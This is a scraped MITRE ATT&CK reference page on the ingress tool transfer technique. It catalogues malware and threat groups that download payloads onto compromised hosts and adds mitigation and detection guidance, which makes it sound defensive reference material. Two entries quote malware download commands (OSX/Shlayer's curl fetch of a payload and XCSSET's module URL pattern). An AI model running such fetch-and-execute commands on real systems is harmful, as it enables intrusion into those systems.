Ingress Tool Transfer

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.

ID: T1105
Sub-techniques:  No sub-techniques
Platforms: Linux, Windows, macOS
Permissions Required: User
Version: 2.0
Created: 31 May 2017
Last Modified: 20 March 2020
Provided by LAYER 8

Procedure Examples

ID Name Description
S0469 ABK

ABK has the ability to download files from C2.[1]

S0331 Agent Tesla

Agent Tesla can download additional files for execution on the victim’s machine.[2][3]

S0092 Agent.btz

Agent.btz attempts to download an encrypted binary from a specified domain.[4]

G0130 Ajax Security Team

Ajax Security Team has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.[5]

S0504 Anchor

Anchor can download additional payloads.[6][7]

G0138 Andariel

Andariel has downloaded additional tools and malware onto compromised hosts.[8]

G0099 APT-C-36

APT-C-36 has downloaded binary data from a specified domain after the malicious document is opened.[9]

G0026 APT18

APT18 can upload a file to the victim’s machine.[10]

G0007 APT28

APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.[11][12][13][14][15]

G0016 APT29

APT29 has downloaded additional tools, such as TEARDROP malware and Cobalt Strike, to a compromised host following initial access.[16]

G0022 APT3

APT3 has a tool that can copy files to remote machines.[17]

G0050 APT32

APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.[18]

G0064 APT33

APT33 has downloaded additional files and programs from its C2 server.[19][20]

G0067 APT37

APT37 has downloaded second stage malware from compromised websites.[21][22][23][24]

G0082 APT38

APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine.[25]

G0087 APT39

APT39 has downloaded tools to compromised hosts.[26][27]

G0096 APT41

APT41 used certutil to download additional files.[28][29][30]

S0456 Aria-body

Aria-body has the ability to download additional payloads from C2.[31]

S0373 Astaroth

Astaroth uses certutil and BITSAdmin to download additional malware. [32][33][34]

S0438 Attor

Attor can download additional plugins, updates and other files. [35]

S0347 AuditCred

AuditCred can download files and additional malware.[36]

S0473 Avenger

Avenger has the ability to download files from C2 to a compromised host.[1]

S0344 Azorult

Azorult can download and execute additional files. Azorult has also downloaded a ransomware payload called Hermes.[37][38]

S0414 BabyShark

BabyShark has downloaded additional files from the C2.[39][40]

S0475 BackConfig

BackConfig can download and execute additional payloads on a compromised host.[41]

G0135 BackdoorDiplomacy

BackdoorDiplomacy has downloaded additional files and tools onto a compromised host.[42]


BADFLICK has download files from its C2 server.[43]


BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself.[44][45][46]

S0337 BadPatch

BadPatch can download and execute or update malware.[47]

S0234 Bandook

Bandook can download files to the system.[48]

S0239 Bankshot

Bankshot uploads files and secondary payloads to the victim's machine.[49]

S0534 Bazar

Bazar can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as Cobalt Strike.[50][51][52][53]

S0470 BBK

BBK has the ability to download files from C2 to the infected host.[1]

S0574 BendyBear

BendyBear is designed to download an implant from a C2 server.[54]


BISCUIT has a command to download a file from the C2 server.[55]

S0268 Bisonal

Bisonal has the capability to download files to execute on the victim’s machine.[56][57]

S0190 BITSAdmin

BITSAdmin can be used to create BITS Jobs to upload and/or download files.[58]

S0564 BlackMould

BlackMould has the ability to download files to the victim's machine.[59]


BLINDINGCAN has downloaded files to a victim machine.[60]


BLUELIGHT can download additional files onto the host.[23]

S0486 Bonadan

Bonadan can download additional modules from the C2 server.[61]


BONDUPDATER can download or upload files from its C2 server.[62]

S0635 BoomBox

BoomBox has the ability to download next stage malware components to a compromised system.[63]

S0651 BoxCaon

BoxCaon can download files.[64]

S0204 Briba

Briba downloads files onto infected hosts.[65]


BRONZE BUTLER has used various tools to download files, including DGet (a similar tool to wget).[66]

S0471 build_downer

build_downer has the ability to download files from C2 to the infected host.[1]

S0482 Bundlore

Bundlore can download and execute new versions of itself.[67]

S0274 Calisto

Calisto has the capability to upload and download files to the victim's machine.[68]

S0077 CallMe

CallMe has the capability to download a file to the victim from the C2 server.[69]

S0351 Cannon

Cannon can download a payload for execution.[70]

S0484 Carberp

Carberp can download and execute new plugins from the C2 server. [71][72]

S0348 Cardinal RAT

Cardinal RAT can download and execute additional payloads.[73]


CARROTBALL has the ability to download and install a remote payload.[74]


CARROTBAT has the ability to download and execute a remote file via certutil.[75]

S0572 Caterpillar WebShell

Caterpillar WebShell has a module to download and upload files to the system.[76]

S0160 certutil

certutil can be used to download files from a given URL.[77][78]

S0631 Chaes

Chaes can download additional files onto an infected machine.[79]

S0144 ChChes

ChChes is capable of downloading files, including additional modules.[80][81][82]

G0114 Chimera

Chimera has remotely copied tools and malware onto targeted systems.[83]

S0020 China Chopper

China Chopper's server component can download remote files.[84][85][86]


CHOPSTICK is capable of performing remote file transmission.[87]

S0054 CloudDuke

CloudDuke downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.[88]

S0106 cmd

cmd can be used to copy files to/from a remotely connected external system.[89]

G0080 Cobalt Group

Cobalt Group has used public sites such as and to upload files and then download them to victim computers.[90][91] The group's JavaScript backdoor is also capable of downloading files.[92]

S0154 Cobalt Strike

Cobalt Strike can deliver additional payloads to victim machines.[93][94]

S0369 CoinTicker

CoinTicker executes a Python script to download its second stage.[95]

S0608 Conficker

Conficker downloads an HTTP server to the infected machine.[96]

S0492 CookieMiner

CookieMiner can download additional scripts from a web server.[97]


CORESHELL downloads another dropper from its C2 server.[98]

S0614 CostaBricks

CostaBricks has been used to load SombRAT onto a compromised host.[99]

S0115 Crimson

Crimson contains a command to retrieve files from its C2 server.[100][101]

S0498 Cryptoistic

Cryptoistic has the ability to send and receive files.[102]

S0527 CSPY Downloader

CSPY Downloader can download additional tools to a compromised host.[103]

S0625 Cuba

Cuba can download files from its C2 server.[104]

S0497 Dacls

Dacls can download its payload from a C2 server.[102][105]

S0334 DarkComet

DarkComet can load any files onto the infected machine to execute.[106][107]

G0012 Darkhotel

Darkhotel has used first-stage payloads that download additional malware from C2 servers.[108]

S0187 Daserf

Daserf can download remote files.[109][66]


DDKONG downloads and uploads files on the victim’s machine.[110]


DEATHRANSOM can download files to a compromised host.[111]

S0354 Denis

Denis deploys additional backdoors and hacking tools to the system.[112]

S0200 Dipsind

Dipsind can download remote files.[113]


DOGCALL can download and execute additional payloads.[114]

S0600 Doki

Doki has downloaded scripts from C2.[115]

S0472 down_new

down_new has the ability to download files to the compromised host.[1]

S0134 Downdelph

After downloading its main config file, Downdelph downloads multiple payloads from C2 servers.[116]

G0074 Dragonfly 2.0

Dragonfly 2.0 copied and installed tools for operations once in the victim environment.[117][118]

S0547 DropBook

DropBook can download and execute additional files.[119][120]

S0502 Drovorub

Drovorub can download files to a compromised host.[121]

S0567 Dtrack

Dtrack’s can download and upload a file to the victim’s computer.[122][123]

S0024 Dyre

Dyre has a command to download and executes additional files.[124]

S0624 Ecipekac

Ecipekac can download additional payloads to a compromised host.[125]

S0554 Egregor

Egregor has the ability to download files from its C2 server.[126][127]

G0066 Elderwood

The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location.[128]

S0081 Elise

Elise can download additional files from the C2 server for execution.[129]

S0082 Emissary

Emissary has the capability to download files from the C2 server.[130]

S0363 Empire

Empire can upload and download to and from a victim machine.[131]

S0404 esentutl

esentutl can be used to copy files from a given URL.[132]

S0396 EvilBunny

EvilBunny has downloaded additional Lua scripts from the C2.[133]


EVILNUM can download and upload files to the victim's computer.[134][135]

G0120 Evilnum

Evilnum can deploy additional components or tools as needed.[134]

S0401 Exaramel for Linux

Exaramel for Linux has a command to download a file from and to a remote C2 server.[136][137]

S0569 Explosive

Explosive has a function to download a file to the infected system.[138]

S0171 Felismus

Felismus can download files from remote servers.[139]


FELIXROOT downloads and uploads files to and from the victim’s machine.[140][141]

G0046 FIN7

FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.[142][143]

G0061 FIN8

FIN8 has used remote code execution to download subsequent payloads.[144][145]

G0117 Fox Kitten

Fox Kitten has downloaded additional tools including PsExec directly to endpoints.[146]

G0101 Frankenstein

Frankenstein has uploaded and downloaded files to utilize additional plugins.[147]

S0628 FYAnti

FYAnti can download additional payloads to a compromised host.[125]


GALLIUM dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and HTRAN.[148][59]

G0047 Gamaredon Group

Tools used by Gamaredon Group are capable of downloading and executing additional payloads.[149][150][151]

S0168 Gazer

Gazer can execute a task to download a file.[152][153]

S0032 gh0st RAT

gh0st RAT can download files to the victim’s machine.[154][155]

S0249 Gold Dragon

Gold Dragon can download additional components from the C2 server.[156]

S0493 GoldenSpy

GoldenSpy constantly attempts to download and execute files from the remote C2, including GoldenSpy itself if not found on the system.[157]

S0588 GoldMax

GoldMax can download and execute additional files.[158][159]

G0078 Gorgon Group

Gorgon Group malware can download additional files from C2 servers.[160]

S0531 Grandoreiro

Grandoreiro can download its second stage from a hardcoded URL within the loader's code.[161][162]

S0342 GreyEnergy

GreyEnergy can download additional modules and payloads.[141]

S0632 GrimAgent

GrimAgent has the ability to download and execute additional payloads.[163]

S0561 GuLoader

GuLoader can download further malware for execution on the victim's machine.[164]

S0132 H1N1

H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.[165]


HAFNIUM has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host.[166]

S0499 Hancitor

Hancitor has the ability to download additional files from C2.[167]


can download and execute a second-stage payload.[21]

S0170 Helminth

Helminth can download additional files.[168]

S0087 Hi-Zor

Hi-Zor has the ability to upload and download files from its C2 server.[169]

S0394 HiddenWasp

HiddenWasp downloads a tar compressed archive from a download server to the system.[170]

S0601 Hildegard

Hildegard has downloaded additional scripts that build and run Monero cryptocurrency miners.[171]


HOPLIGHT has the ability to connect to a remote host in order to upload and download files.[172]

S0431 HotCroissant

HotCroissant has the ability to upload a file from the command and control (C2) server to the victim machine.[173]

S0070 HTTPBrowser

HTTPBrowser is capable of writing a file to the compromised system from the C2 server.[174]

S0203 Hydraq

Hydraq creates a backdoor through which remote attackers can download files and additional malware components.[175][176]

S0398 HyperBro

HyperBro has the ability to download additional files.[177]

S0483 IcedID

IcedID has the ability to download additional modules and a configuration file from C2.[178][179]

G0136 IndigoZebra

IndigoZebra has downloaded additional files and tools from its C2 server.[64]

G0119 Indrik Spider

Indrik Spider has downloaded additional scripts, malware, and tools onto a compromised host.[180][181]

S0604 Industroyer

Industroyer downloads a shellcode payload from a remote C2 server and loads it into memory.[182]

S0260 InvisiMole

InvisiMole can upload files to the victim's machine for operations.[183][184]

S0015 Ixeshe

Ixeshe can download and execute additional files.[185]

S0528 Javali

Javali can download payloads from remote C2 servers.[34]


JHUHUGIT can retrieve an additional payload from its C2 server.[186][187] JHUHUGIT has a command to download files to the victim’s machine.[188]

S0201 JPIN

JPIN can download files and upgrade itself.[113]

S0283 jRAT

jRAT can download and execute files.[189][190][191]

S0648 JSS Loader

JSS Loader has the ability to download malicious executables to a compromised host.[192]


KARAE can upload and download files, including second-stage malware.[21]

S0088 Kasidet

Kasidet has the ability to download and execute additional files.[193]

S0265 Kazuar

Kazuar downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary.[194]

S0585 Kerrdown

Kerrdown can download specific payloads to a compromised host based on OS architecture.[195]

S0487 Kessel

Kessel can download additional modules from the C2 server.[61]

S0387 KeyBoy

KeyBoy has a download and upload functionality.[196][197]


KEYMARBLE can upload files to the victim’s machine and can download additional payloads.[198]


KGH_SPY has the ability to download and execute code from remote servers.[103]

G0094 Kimsuky

Kimsuky has used scripts to download additional tools from compromised domains to victim systems.[29]

S0599 Kinsing

Kinsing has downloaded additional lateral movement scripts from C2.[199]

S0437 Kivars

Kivars has the ability to download and execute files.[200]

S0250 Koadic

Koadic can download additional files.[201]


KONNI can download files and execute them on the victim’s machine.[202]

S0236 Kwampirs

Kwampirs downloads additional files from C2 servers.[203]

G0032 Lazarus Group

Several Lazarus Group malware families are capable of downloading and executing binaries from its C2 server.[204][205][206][102][105]

G0065 Leviathan

Leviathan has downloaded additional scripts and files from adversary-controlled servers.[207][84]

S0395 LightNeuron

LightNeuron has the ability to download and execute additional files.[208]

S0211 Linfo

Linfo creates a backdoor through which remote attackers can download files onto compromised hosts.[209]

S0513 LiteDuke

LiteDuke has the ability to download files.[210]

S0447 Lokibot

Lokibot downloaded several staged items onto the victim's machine.[211]

S0451 LoudMiner

LoudMiner used SCP to update the miner from the C2.[212]


LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.[213]

S0532 Lucifer

Lucifer can download and execute a replica of itself using certutil.[214]

S0409 Machete

Machete can download additional files for execution on the victim’s machine.[215]

G0059 Magic Hound

Magic Hound has downloaded additional code and files from servers onto victims.[216]

S0652 MarkiRAT

MarkiRAT can download additional files and tools from its C2 server, including through the use of BITSAdmin.[217]

S0500 MCMD

MCMD can upload additional files to a compromised host.[218]

S0459 MechaFlounder

MechaFlounder has the ability to upload and download files to and from a compromised host.[219]

S0530 Melcoz

Melcoz has the ability to download additional files to a compromised host.[34]

G0045 menuPass

menuPass has installed updates and new malware on victims.[220][221]

S0455 Metamorfo

Metamorfo has used MSI files to download additional files to execute.[222][223][224][225]

S0339 Micropsia

Micropsia can download and execute an executable from the C2 server.[226][227]

S0051 MiniDuke

MiniDuke can download additional encrypted backdoors onto the victim via GIF files.[228][210]

S0083 Misdat

Misdat is capable of downloading files from the C2.[229]

S0080 Mivast

Mivast has the capability to download and execute .exe files.[230]

S0079 MobileOrder

MobileOrder has a command to download a file from the C2 server to the victim mobile device's SD card.[69]

S0553 MoleNet

MoleNet can download additional payloads from the C2.[119]

G0021 Molerats

Molerats used executables to download malicious files from different sources.[231][232]

S0284 More_eggs

More_eggs can download and launch additional payloads.[233][234]

S0256 Mosquito

Mosquito can upload and download files to the victim.[235]

G0069 MuddyWater

MuddyWater has used malware that can upload additional files to the victim’s machine.[236][237][238][239]

G0129 Mustang Panda

Mustang Panda has downloaded additional executables following the initial infection stage.[240]

S0228 NanHaiShu

NanHaiShu can download additional files from URLs.[207]

S0336 NanoCore

NanoCore has the capability to download and activate additional modules for execution.[241][242]

S0247 NavRAT

NavRAT can download files remotely.[243]

S0272 NDiskMonitor

NDiskMonitor can download and execute a file from given URL.[46]

S0630 Nebulae

Nebulae can download files from C2.[244]

S0210 Nerex

Nerex creates a backdoor through which remote attackers can download files onto a compromised host.[128]

S0457 Netwalker

Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.[245]


NETWIRE can downloaded payloads from C2 to the compromised host.[246][247]

S0118 Nidiran

Nidiran can download and execute files.[248]

S0385 njRAT

njRAT can download files to the victim’s machine.[249][250]


NOKKI has downloaded a remote module for execution.[251]

G0133 Nomadic Octopus

Nomadic Octopus has used malicious macros to download additional files to the victim's machine.[252]

S0340 Octopus

Octopus can download additional files and tools onto the victim’s machine.[253][254][252]

G0049 OilRig

OilRig can download remote files onto victims.[255]

S0439 Okrum

Okrum has built-in commands for uploading, downloading, and executing files to the system.[256]

S0264 OopsIE

OopsIE can download files from its C2 server to the victim's machine.[257][258]

G0116 Operation Wocao

Operation Wocao can download additional files to the infected system.[259]

S0229 Orz

Orz can download files onto the victim.[207]

S0402 OSX/Shlayer

OSX/Shlayer can download payloads, and extract bytes from files. OSX/Shlayer uses the curl -fsL "$url" >$tmp_path command to download malicious payloads into a temporary directory.[260][261][262][263]


OSX_OCEANLOTUS.D has a command to download and execute a file on the victim’s machine.[264][265]

S0598 P.A.S. Webshell

P.A.S. Webshell can upload and download files to and from compromised hosts.[137]

S0626 P8RAT

P8RAT can download additional payloads to a target system.[125]

S0208 Pasam

Pasam creates a backdoor through which remote attackers can upload files.[266]

G0040 Patchwork

Patchwork payloads download additional files from the C2 server.[267][46]

S0587 Penquin

Penquin can execute the command code do_download to retrieve remote files from C2.[268]

S0643 Peppy

Peppy can download and execute remote files.[100]

S0501 PipeMon

PipeMon can install additional modules via C2 commands.[269]

S0124 Pisloader

Pisloader has a command to upload a file to the victim machine.[270]


PLAINTEE has downloaded and executed additional plugins.[110]


PLATINUM has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel.[271]


PLEAD has the ability to upload and download files to and from an infected host.[272]

S0013 PlugX

PlugX has a module to download and execute files on the compromised machine.[273]

S0428 PoetRAT

PoetRAT has the ability to copy files and download/upload files into C2 channels using FTP and HTTPS.[274][275]

S0012 PoisonIvy

PoisonIvy creates a backdoor through which remote attackers can upload files.[276]

S0518 PolyglotDuke

PolyglotDuke can retrieve payloads from the C2 server.[210]

S0453 Pony

Pony can download additional files onto the infected system.[277]


POSHSPY downloads and executes additional PowerShell code and Windows binaries.[278]

S0139 PowerDuke

PowerDuke has a command to download a file.[279]


POWERSOURCE has been observed being used to download TEXTMATE and the Cobalt Strike Beacon payload onto victims.[280]


POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server.[281]


POWRUNER can download or upload files from its C2 server.[255]

S0078 Psylo

Psylo has a command to download a file to the system from its C2 server.[69]

S0147 Pteranodon

Pteranodon can download and execute additional files.[149]


PUNCHBUGGY can download additional files and payloads to compromised hosts.[282][283]

S0192 Pupy

Pupy can upload and download to/from a victim machine.[284]

S0650 QakBot

QakBot has the ability to download additional components and malware.[285][286][287][288][289][290]

S0262 QuasarRAT

QuasarRAT can download files to the victim’s machine and execute them.[291][292]

S0629 RainyDay

RainyDay can download files to a compromised host.[244]

G0075 Rancor

Rancor has downloaded additional malware, including by using certutil.[110]


RARSTONE downloads its backdoor component from a C2 server and loads it directly into memory.[293]


RATANKBA uploads and downloads information.[294][295]

S0495 RDAT

RDAT can download files via DNS.[296]

S0153 RedLeaves

RedLeaves is capable of downloading a file from a specified URL.[297]

S0511 RegDuke

RegDuke can download files from C2.[210]

S0332 Remcos

Remcos can upload and download files to and from the victim’s machine.[298]

S0166 RemoteCMD

RemoteCMD copies a file over to the remote system before execution.[299]

S0592 RemoteUtilities

RemoteUtilities can upload and download files to and from a target machine.[239]

S0125 Remsec

Remsec contains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS.[300][301]

S0379 Revenge RAT

Revenge RAT has the ability to upload and download files.[302]

S0496 REvil

REvil can download a copy of itself from an attacker controlled IP address to the victim machine.[303][304][305]

S0258 RGDoor

RGDoor uploads and downloads files to and from the victim’s machine.[306]

G0106 Rocke

Rocke used malware to download additional malicious files to the target system.[307]

S0270 RogueRobin

RogueRobin can save a new file to the system from the C2 server.[308][309]


ROKRAT retrieves additional malicious payloads from the C2 server.[310][311]

S0148 RTM

RTM can download additional files.[312][313]

S0074 Sakula

Sakula has the capability to download files.[314]

G0034 Sandworm Team

Sandworm Team has pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data.[315][316]

S0461 SDBbot

SDBbot has the ability to download a DLL from C2 to a compromised host.[317]

S0053 SeaDuke

SeaDuke is capable of uploading and downloading files.[318]

S0345 Seasalt

Seasalt has a command to download additional files.[55][55]


SEASHARPEE can download remote files onto victims.[319]

S0382 ServHelper

ServHelper may download additional files to execute.[320][321]

S0639 Seth-Locker

Seth-Locker has the ability to download and execute files on a compromised host.[322]

S0596 ShadowPad

ShadowPad has downloaded code from a C2 server.[323]

S0140 Shamoon

Shamoon can download an executable to run on the victim.[324]

G0104 Sharpshooter

Sharpshooter downloaded additional payloads after a target was infected with a first-stage downloader.[325]

S0546 SharpStage

SharpStage has the ability to download and execute additional payloads via a DropBox API.[119][120]


SHARPSTATS has the ability to upload and download files.[326]

S0444 ShimRat

ShimRat can download additional files.[327]

S0445 ShimRatReporter

ShimRatReporter had the ability to download additional payloads.[327]


SHUTTERSPEED can download and execute an arbitary executable.[21]

S0589 Sibot

Sibot can download and execute a payload onto a compromised system.[158]

S0610 SideTwist

SideTwist has the ability to download additional files.[328]

G0121 Sidewinder

Sidewinder has used LNK files to download remote files to the victim's network.[329][330]

G0091 Silence

Silence has downloaded additional modules and malware to victim’s machines.[331]

S0468 Skidmap

Skidmap has the ability to download files on an infected host.[332]

S0633 Sliver

Sliver can upload files from the C2 server to the victim machine using the upload command.[333]


SLOTHFULMEDIA has downloaded files onto a victim machine.[334]


SLOWDRIFT downloads additional payloads.[21]

S0226 Smoke Loader

Smoke Loader downloads a new version of itself once it has installed. It also downloads additional plugins.[335]


SMOKEDHAM has used Powershell to download UltraVNC and Ngrok from third-party file sharing sites.[336]

S0627 SodaMaster

SodaMaster has the ability to download additional payloads from C2 to the targeted system.[125]

S0615 SombRAT

SombRAT has the ability to download and execute additional payloads.[99][111][337]

S0516 SoreFang

SoreFang can download additional payloads from C2.[338][339]

S0374 SpeakUp

SpeakUp downloads and executes additional files from a remote server. [340]

S0646 SpicyOmelette

SpicyOmelette can download malicious files from threat actor controlled AWS URL's.[341]

S0390 SQLRat

SQLRat can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk.[342]

S0380 StoneDrill

StoneDrill has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victims machine.[343]

S0491 StrongPity

StrongPity can download files to specified targets.[344]


SUNBURST delivered different payloads, including TEARDROP in at least one instance.[16]

G0092 TA505

TA505 has downloaded additional malware to execute on victim systems.[345][321][346]

G0127 TA551

TA551 has retrieved DLLs and installer binaries for malware execution from C2.[347]

S0011 Taidoor

Taidoor has downloaded additional files onto a compromised host.[348]


TAINTEDSCRIBE can download additional modules from its C2 server.[349]


TDTESS has a command to download and execute an additional file.[350]

G0139 TeamTNT

TeamTNT has the curl command and batch scripts to download new tools.[351]

S0595 ThiefQuest

ThiefQuest can download and execute payloads in-memory or from disk.[352]

G0027 Threat Group-3390

After re-establishing access to a victim network, Threat Group-3390 actors download tools including gsecdump and WCE that are staged temporarily on websites that were previously compromised but never used.[174]

G0131 Tonto Team

Tonto Team has downloaded malicious DLLs which served as a ShadowPad loader.[353]

S0266 TrickBot

TrickBot downloads several additional files and saves them to the victim's machine.[354][355]

S0094 Trojan.Karagany

Trojan.Karagany can upload, download, and execute files on the victim.[356][357]

G0081 Tropic Trooper

Tropic Trooper has used a delivered trojan to download additional files.[358]

S0436 TSCookie

TSCookie has the ability to upload and download files to and from the infected host.[359]

S0647 Turian

Turian can download additional files and tools from its C2.[42]

G0010 Turla

Turla has used shellcode to download Meterpreter after compromising a victim.[360]


TURNEDUP is capable of downloading additional files.[361]


TYPEFRAME can upload and download files to the victim’s machine.[362]

S0333 UBoatRAT

UBoatRAT can upload and download files to the victim’s machine.[363]

S0130 Unknown Logger

Unknown Logger is capable of downloading remote files.[44]


UPPERCUT can download and upload files to and from the victim’s machine.[364]

S0386 Ursnif

Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads.[365][366]

S0476 Valak

Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and NetSupport Manager RAT-based malware.[367][368]

S0636 VaporRage

VaporRage has the ability to download malicious shellcode to compromised systems.[63]

S0207 Vasport

Vasport can download files.[369]

S0442 VBShower

VBShower has the ability to download VBS files to the target computer.[370]


VERMIN can download and upload files to the victim's machine.[371]

G0123 Volatile Cedar

Volatile Cedar can deploy additional tools.[76]

S0180 Volgmer

Volgmer can download remote files and additional payloads to the victim's machine.[372][373][374]

S0579 Waterbear

Waterbear can receive and load executables from remote C2 servers.[375]

S0109 WEBC2

WEBC2 can download and execute a file.[376]

S0515 WellMail

WellMail can receive data and executable scripts from C2.[377]

S0514 WellMess

WellMess can write files to a compromised host.[378][379]

G0107 Whitefly

Whitefly has the ability to download additional tools from the C2.[380]

S0206 Wiarp

Wiarp creates a backdoor through which remote attackers can download files.[381]

G0112 Windshift

Windshift has used tools to deploy additional payloads to compromised hosts.[382]

S0430 Winnti for Linux

Winnti for Linux has the ability to deploy modules directly from command and control (C2) servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host. [383]


WIRTE has downloaded PowerShell code from the C2 server to be executed.[384]

S0341 Xbash

Xbash can download additional malicious files from its C2 server.[385]

S0653 xCaon

xCaon has a command to download files to the victim's machine.[64]


XCSSET downloads browser specific AppleScript modules using a constructed URL with the curl command, https://" & domain & "/agent/scripts/" & moduleName & ".applescript.[386]


YAHOYAH uses HTTP GET requests to download other files that are executed in memory.[387]

S0251 Zebrocy

Zebrocy obtains additional code to execute on the victim's machine, including the downloading of a secondary payload.[388][70][389][13]

S0230 ZeroT

ZeroT can download additional payloads onto the victim.[390]

S0330 Zeus Panda

Zeus Panda can download additional malware plug-in modules and execute them on the victim’s machine.[391]


ZIRCONIUM has used tools to download malicious files to compromised hosts.[392]

S0086 ZLib

ZLib has the ability to download files.[229]

S0412 ZxShell

ZxShell has a command to transfer files from a remote host.[393]


ID Mitigation Description
M1031 Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[394]


ID Data Source Data Component
DS0022 File File Creation
DS0029 Network Traffic Network Connection Creation
Network Traffic Content
Network Traffic Flow

Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[394]


  1. Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.
  2. Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.
  3. The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018.
  4. Shevchenko, S.. (2008, November 30). Agent.btz - A Threat That Hit Pentagon. Retrieved April 8, 2016.
  5. Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018.
  6. Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.
  7. Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020.
  8. AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021.
  9. QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020.
  10. Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018.
  11. Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.
  12. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
  13. Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
  14. Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.
  15. NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
  16. FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.
  17. Chen, X., Scott, M., Caselden, D.. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.
  18. Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.
  19. Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.
  20. Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.
  21. FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.
  22. GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.
  23. Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021.
  24. Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.
  25. FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.
  26. Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020.
  27. FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020.
  28. Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.
  29. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
  30. Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.
